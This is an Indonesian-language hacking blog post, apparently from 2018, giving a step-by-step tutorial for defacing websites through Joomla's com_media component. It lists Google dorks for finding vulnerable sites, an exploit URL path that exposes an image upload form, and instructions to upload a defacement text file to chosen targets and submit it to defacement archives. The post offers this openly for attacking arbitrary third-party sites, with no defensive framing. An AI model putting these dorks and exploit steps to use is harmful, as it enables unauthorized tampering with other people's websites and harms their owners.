Tuesday, 3 April 2018

Deface Com_media

Idiot BlackHat Tuesday, April 03, 2018 Leave a Reply
Author : Anonimokerl

Hae, bertemu lagi dengan mimin yang super tamvan. Kali ini mimin akan share deface poc Com_media. Walaupun poc ini cuman bisa upload .txt tapi tetep bisa mirror ko :* Oke langsung saja gan.

1. Bahan-bahan :

  • Script deface txt
  • Internet
  • Hp/Pc 

2. Dork :
   - inurl:index.php?option=com_media (harus pake exploit)
   - inurl:com_media intitle:insert image intext:maximum ( dork tanpa exploit )
3. Exploit :
   - index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=

4. Langkah-langkah
  • Pertama, kita dorking dulu gan.
  • Kedua, pilih target.
  • Ketiga, tambahkan exploit nya dibelakang web.
contoh : https://nimogans.tq/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=

Kalau vuln maka tampilannya akan seperti ini (ada tempat uploadnya) :


  • Ketiga, kalian isi semua kolomnya, dan upload script txt nya
  • Keempat, panggil aja scriptnya di web/images/namasc.txt
contoh : Https://nimogans/images/nimo.txt


Sekian dulu gan :V
Kalo ada yang tidak ngerti  bisa ditanyakan saja :V
Tags:
Previous Post
Next Post
Idiot BlackHat

0 comments: